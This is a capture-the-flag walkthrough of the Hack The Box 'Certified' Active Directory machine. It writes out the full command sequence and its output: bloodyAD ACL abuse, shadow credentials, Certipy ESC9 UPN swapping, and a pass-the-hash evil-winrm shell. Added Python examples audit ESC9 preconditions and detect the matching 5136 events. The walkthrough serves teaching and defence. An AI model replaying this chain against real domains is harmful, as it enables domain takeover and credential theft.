htb certified

Information Gathering

# Nmap 7.98 scan initiated Fri Jan  2 03:47:32 2026 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.41
Nmap scan report for 10.10.11.41
Host is up (0.14s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        (generic dns response: NOTIMP)
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-01-02 10:17:28Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:04:20
| Not valid after:  2105-05-23T21:04:20
| MD5:     3b59 90a0 ed2e 5d54 1f81 c21d c0f0 1258
| SHA-1:   c77f 527a 24d3 9c55 fda8 fadf 269f 7958 9c88 baea
|_SHA-256: 22bd 6df5 0f09 901b a303 963f bd40 94fc a5fe e834 dec6 809c ba47 1f96 bd42 396e
|_ssl-date: 2026-01-02T10:18:55+00:00; +6h29m39s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-01-02T10:18:56+00:00; +6h29m39s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:04:20
| Not valid after:  2105-05-23T21:04:20
| MD5:     3b59 90a0 ed2e 5d54 1f81 c21d c0f0 1258
| SHA-1:   c77f 527a 24d3 9c55 fda8 fadf 269f 7958 9c88 baea
|_SHA-256: 22bd 6df5 0f09 901b a303 963f bd40 94fc a5fe e834 dec6 809c ba47 1f96 bd42 396e
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-01-02T10:18:55+00:00; +6h29m39s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:04:20
| Not valid after:  2105-05-23T21:04:20
| MD5:     3b59 90a0 ed2e 5d54 1f81 c21d c0f0 1258
| SHA-1:   c77f 527a 24d3 9c55 fda8 fadf 269f 7958 9c88 baea
|_SHA-256: 22bd 6df5 0f09 901b a303 963f bd40 94fc a5fe e834 dec6 809c ba47 1f96 bd42 396e
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:04:20
| Not valid after:  2105-05-23T21:04:20
| MD5:     3b59 90a0 ed2e 5d54 1f81 c21d c0f0 1258
| SHA-1:   c77f 527a 24d3 9c55 fda8 fadf 269f 7958 9c88 baea
|_SHA-256: 22bd 6df5 0f09 901b a303 963f bd40 94fc a5fe e834 dec6 809c ba47 1f96 bd42 396e
|_ssl-date: 2026-01-02T10:18:56+00:00; +6h29m39s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.98%I=7%D=1/2%Time=69573FE9%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x85\x84\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2026-01-02T10:18:15
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
|_clock-skew: mean: 6h29m38s, deviation: 0s, median: 6h29m38s

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan  2 03:49:17 2026 -- 1 IP address (1 host up) scanned in 105.83 seconds

Vulnerability Analysis

judith.mader:judith09

First, calibrate the local clock against the DC (the scan above shows a skew of about 6h29m):

  Certified sudo date -s "$(nmap -p 445 10.10.11.41 --script smb2-time | grep 'date: 2'|cut -d ' ' -f 5)"
Fri Jan  2 10:29:36 AM UTC 2026

Collect domain information with bloodhound-python:

bloodhound-python -d certified.htb -u judith.mader -p 'judith09' -dc 'dc01.certified.htb' -c all -ns 10.10.11.41 --zip

image 125.png

BloodHound shows the path: judith.mader (user) --WriteOwner--> Management (group) --GenericWrite--> Management_SVC (user) --GenericAll--> CA_OPERATOR (user)

Exploitation (User Flag)

# Make judith.mader the owner of the management group
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' set owner 'management' judith.mader
[+] Old owner S-1-5-21-729746778-2675978091-3820388244-512 is now replaced by judith.mader on management
# Grant judith.mader GenericAll on the group
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' add genericAll 'management' judith.mader
[+] judith.mader has now GenericAll on management
# Add judith.mader to the group
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' add groupMember 'management' judith.mader
[+] judith.mader added to management
# Query the groups judith.mader belongs to with the ldap module
nxc ldap 10.10.11.41 -u judith.mader -p 'judith09' --query "(sAMAccountName=judith.mader)" "memberOf"

At this point we can use the GenericWrite right over the Management_SVC user:

# Add shadow credentials (a KeyCredential in msDS-KeyCredentialLink) to management_svc
  Certified bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' add shadowCredentials 'management_svc'
[+] KeyCredential generated with following sha256 of RSA key: 27e6dac6b3bf03d0ae9997665206b05b54de55bd629b95d8acd1f3e090c4248f
[+] TGT stored in ccache file management_svc_Df.ccache

NT: a091c1832bcdd4677c28b5a6a1295584

Privilege Escalation (Root Flag)

  Certified certipy find -u ca_operator@certified.htb -hashes 'b4b86f45c6018f1b664f70805f45d8f2' -vulnerable -stdout

This reports ESC9.
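ESC9 rests on two settings that an administrator can audit and fix: a certificate template whose msPKI-Enrollment-Flag carries CT_FLAG_NO_SECURITY_EXTENSION (0x80000), so certificates it issues omit the SID security extension, and a KDC whose StrongCertificateBindingEnforcement registry value (under HKLM\SYSTEM\CurrentControlSet\Services\Kdc) is below 2, so it falls back to mapping such certificates by UPN or DNS name. The Python below is an added audit example, not part of this write-up and not Certipy's own code: it decodes the relevant flag bits, checks for an authentication EKU and manager approval, and combines that with the KDC setting. The template attribute values it evaluates are constructed (assumed) inputs; only the template name CertifiedAuthentication comes from the write-up.

```python
"""Audit the two preconditions of ADCS ESC9: a template that issues certificates
without the SID security extension, and a KDC that still maps such certificates
by UPN/DNS instead of rejecting them."""
from dataclasses import dataclass

# msPKI-Enrollment-Flag bits (MS-CRTD 2.26) relevant to this audit.
ENROLLMENT_FLAG_NAMES = {
    0x00000002: "CT_FLAG_PEND_ALL_REQUESTS",          # manager approval required
    0x00000020: "CT_FLAG_AUTO_ENROLLMENT",
    0x00000100: "CT_FLAG_USER_INTERACTION_REQUIRED",
    0x00080000: "CT_FLAG_NO_SECURITY_EXTENSION",      # omit szOID_NTDS_CA_SECURITY_EXT
}

# EKU OIDs that make a certificate usable for Kerberos (PKINIT) logon.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2": "Client Authentication",
    "1.3.6.1.5.2.3.4": "PKINIT Client Authentication",
    "1.3.6.1.4.1.311.20.2.2": "Smart Card Logon",
    "2.5.29.37.0": "Any Purpose",
}

# Values of HKLM\SYSTEM\CurrentControlSet\Services\Kdc\StrongCertificateBindingEnforcement
KDC_ENFORCEMENT = {0: "disabled", 1: "compatibility", 2: "full enforcement"}


@dataclass
class Template:
    name: str
    enrollment_flag: int        # msPKI-Enrollment-Flag
    ekus: tuple                 # pKIExtendedKeyUsage OIDs; empty tuple = no EKU restriction
    low_priv_can_enroll: bool   # derived from the template DACL (Enroll right for broad groups)


def decode_enrollment_flag(value):
    """Return the names of the audited bits set in an msPKI-Enrollment-Flag value."""
    return [name for bit, name in ENROLLMENT_FLAG_NAMES.items() if value & bit]


def allows_authentication(template):
    """No EKU restriction at all, or at least one authentication-capable EKU."""
    return not template.ekus or any(oid in AUTH_EKUS for oid in template.ekus)


def assess_esc9(template, kdc_enforcement):
    """Return the reasons this template/KDC pair is exposed to ESC9; an empty list
    means at least one precondition is missing, so Kerberos logon with a
    UPN-swapped certificate is not possible."""
    flags = decode_enrollment_flag(template.enrollment_flag)
    if "CT_FLAG_NO_SECURITY_EXTENSION" not in flags:
        return []  # certificates carry the SID extension; strong mapping works
    if "CT_FLAG_PEND_ALL_REQUESTS" in flags:
        return []  # requests are held for manager approval
    if not allows_authentication(template):
        return []
    if not template.low_priv_can_enroll:
        return []
    if kdc_enforcement >= 2:
        return []  # KDC rejects authentication certificates lacking the SID extension
    return [
        f"{template.name}: CT_FLAG_NO_SECURITY_EXTENSION set; issued certificates omit the SID extension",
        f"{template.name}: authentication EKU, no manager approval, enrollable by low-privileged principals",
        f"KDC StrongCertificateBindingEnforcement={kdc_enforcement} ({KDC_ENFORCEMENT[kdc_enforcement]}); "
        "certificates are mapped by UPN/DNS instead of SID",
    ]


# Constructed template values (assumed, not read from the target) for the template
# named in the write-up, next to the remediated variant with the flag cleared.
VULNERABLE_TEMPLATE = Template("CertifiedAuthentication", 0x00080000, ("1.3.6.1.5.5.7.3.2",), True)
HARDENED_TEMPLATE = Template("CertifiedAuthentication", 0x00000000, ("1.3.6.1.5.5.7.3.2",), True)

if __name__ == "__main__":
    for label, tpl, kdc in (("as found", VULNERABLE_TEMPLATE, 1),
                            ("flag cleared", HARDENED_TEMPLATE, 1),
                            ("KDC set to 2", VULNERABLE_TEMPLATE, 2)):
        print(label, "->", assess_esc9(tpl, kdc) or ["not exposed"])
```

Either remediation on its own closes the path: clearing the flag on the template, or setting StrongCertificateBindingEnforcement to 2 on every domain controller (the setting introduced by KB5014754). The audit treats them as independent because an environment with many templates usually fixes the KDC side once and then cleans up templates.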

Change the UPN to administrator:

  Certified certipy account -u 'management_svc' -hashes 'a091c1832bcdd4677c28b5a6a1295584' -dc-ip 10.10.11.41 -upn 'administrator' -user 'ca_operator' update
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : administrator
[*] Successfully updated 'ca_operator'

Request a certificate:

  Certified certipy req -u CA_OPERATOR -hashes 'b4b86f45c6018f1b664f70805f45d8f2' -dc-ip 10.10.11.41 -ca 'certified-DC01-CA' -template 'CertifiedAuthentication' -debug
[*] Saving certificate and private key to 'administrator.pfx'
[+] Attempting to write data to 'administrator.pfx'
[+] Data written to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

Restore the UPN:

  Certified certipy account -u 'management_svc' -hashes 'a091c1832bcdd4677c28b5a6a1295584' -dc-ip 10.10.11.41 -upn 'CA_OPERATOR@certified.htb' -user 'CA_OPERATOR' update
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : CA_OPERATOR@certified.htb
[*] Successfully updated 'ca_operator'

Authenticate with the certificate:

  Certified certipy auth -dc-ip '10.10.11.41' -pfx 'administrator.pfx' -username 'administrator' -domain 'certified.htb'
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator'
[*] Using principal: 'administrator@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34
  Certified evil-winrm -u administrator -H 0d5b49608bbce1751f708748f67e2d34 -i certified.htb

Evil-WinRM shell v3.9

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
25313f415eb17c6f9856e10e820d9769
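Every directory write in this chain (the owner and ACL rewrite on the Management group, the self-add to that group, the KeyCredential written to management_svc, and the UPN swap on ca_operator that is reverted a few minutes later) is recorded as Windows Security event 5136 (Directory Service Changes) when the "Audit Directory Service Changes" subcategory is enabled and the objects carry a SACL. The Python below is an added detection example, not part of this write-up: it correlates a constructed set of such events by actor and time window and reports the patterns above. The event records are constructed and their field names are simplified from the 5136 EventData schema; the domain SID is the one visible in the bloodyAD output above, while the RID 1103 and the list of known account names are assumptions.

```python
"""Correlate Directory Service Change events (Security 5136) into the abuse
patterns seen in this write-up: ACL/owner rewrite followed by group self-add,
shadow credential written to another account, transient UPN swap."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

DOMAIN_SID = "S-1-5-21-729746778-2675978091-3820388244"  # domain SID from the bloodyAD output
OWNER_RID = "1103"  # constructed RID standing in for the judith.mader account

# Constructed sample events; real 5136 events carry SubjectUserName, ObjectDN,
# ObjectClass, AttributeLDAPDisplayName, AttributeValue and OperationType
# (%%14674 = value added, %%14675 = value deleted).
SAMPLE_EVENTS = [
    {"time": "2026-01-02T10:31:05", "subject": "judith.mader", "class": "group",
     "object": "CN=Management,CN=Users,DC=certified,DC=htb",
     "attribute": "nTSecurityDescriptor", "op": "added",
     "value": f"O:{DOMAIN_SID}-{OWNER_RID}G:DUD:(A;;GA;;;{DOMAIN_SID}-{OWNER_RID})"},
    {"time": "2026-01-02T10:31:40", "subject": "judith.mader", "class": "group",
     "object": "CN=Management,CN=Users,DC=certified,DC=htb",
     "attribute": "member", "op": "added",
     "value": "CN=judith.mader,CN=Users,DC=certified,DC=htb"},
    {"time": "2026-01-02T10:33:12", "subject": "judith.mader", "class": "user",
     "object": "CN=management_svc,CN=Users,DC=certified,DC=htb",
     "attribute": "msDS-KeyCredentialLink", "op": "added",
     "value": "B:828:00020000200001...:CN=management_svc,CN=Users,DC=certified,DC=htb"},
    # benign noise: a helpdesk account adds a user to a group it already administers
    {"time": "2026-01-02T10:35:00", "subject": "helpdesk", "class": "group",
     "object": "CN=Staff,CN=Users,DC=certified,DC=htb",
     "attribute": "member", "op": "added",
     "value": "CN=new.hire,CN=Users,DC=certified,DC=htb"},
    {"time": "2026-01-02T10:40:01", "subject": "management_svc", "class": "user",
     "object": "CN=ca_operator,CN=Users,DC=certified,DC=htb",
     "attribute": "userPrincipalName", "op": "deleted", "value": "ca_operator@certified.htb"},
    {"time": "2026-01-02T10:40:01", "subject": "management_svc", "class": "user",
     "object": "CN=ca_operator,CN=Users,DC=certified,DC=htb",
     "attribute": "userPrincipalName", "op": "added", "value": "administrator"},
    {"time": "2026-01-02T10:45:30", "subject": "management_svc", "class": "user",
     "object": "CN=ca_operator,CN=Users,DC=certified,DC=htb",
     "attribute": "userPrincipalName", "op": "added", "value": "ca_operator@certified.htb"},
]

# Constructed sAMAccountName inventory; in production this comes from an LDAP export.
KNOWN_ACCOUNTS = {"administrator", "judith.mader", "management_svc", "ca_operator", "helpdesk", "new.hire"}


def rdn_value(dn):
    """'CN=ca_operator,CN=Users,DC=certified,DC=htb' -> 'ca_operator'."""
    return dn.split(",", 1)[0].split("=", 1)[1].strip().lower()


def sddl_owner(sddl):
    """Owner SID (or two-letter alias) from the O: component of an SDDL string."""
    m = re.match(r"O:(S-1-[0-9-]+|[A-Z]{2})", sddl)
    return m.group(1) if m else "unknown"


def detect_directory_abuse(events, known_accounts, window=timedelta(minutes=30)):
    """Return human-readable findings, in detection order."""
    findings = []
    acl_changes = {}                 # (subject, group) -> time of descriptor rewrite
    upn_changes = defaultdict(list)  # account -> [(time, subject, new UPN)]
    for e in sorted(events, key=lambda ev: ev["time"]):
        t = datetime.fromisoformat(e["time"])
        subject, target = e["subject"].lower(), rdn_value(e["object"])
        attr, op, value = e["attribute"], e["op"], e["value"]
        if attr == "nTSecurityDescriptor" and e["class"] == "group":
            acl_changes[(subject, target)] = t
            findings.append(f"{e['time']} {subject} rewrote the security descriptor of group {target} "
                            f"(owner now {sddl_owner(value)})")
        elif attr == "member" and op == "added":
            since = acl_changes.get((subject, target))
            if since is not None and t - since <= window:
                who = "themself" if rdn_value(value) == subject else rdn_value(value)
                findings.append(f"{e['time']} {subject} added {who} to {target} "
                                f"{int((t - since).total_seconds())}s after changing its ACL")
        elif attr == "msDS-KeyCredentialLink" and op == "added" and subject != target:
            findings.append(f"{e['time']} {subject} wrote a KeyCredential onto {target} (shadow credential)")
        elif attr == "userPrincipalName" and op == "added":
            upn_changes[target].append((t, subject, value))
    for account, changes in upn_changes.items():
        for t, subject, value in changes:
            prefix = value.split("@", 1)[0].lower()
            if prefix == account or prefix not in known_accounts:
                continue  # ordinary rename, or no collision with another principal
            findings.append(f"{t.isoformat()} {subject} set UPN of {account} to '{value}', "
                            f"colliding with account {prefix}")
            restored = [t2 for t2, _, v2 in changes
                        if t2 > t and t2 - t <= window and v2.split("@", 1)[0].lower() == account]
            if restored:
                findings.append(f"{restored[0].isoformat()} UPN of {account} restored: transient UPN swap")
    return findings


if __name__ == "__main__":
    for line in detect_directory_abuse(SAMPLE_EVENTS, KNOWN_ACCOUNTS):
        print(line)
```

The UPN rule is the one that matters most for ESC9: a UPN whose left-hand part equals another account's sAMAccountName, especially when it is changed back shortly afterwards, has no legitimate administrative use, and the certificate issued in between can be tied back through the CA's own issuance log (event 4887) by timestamp.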

Lessons Learned
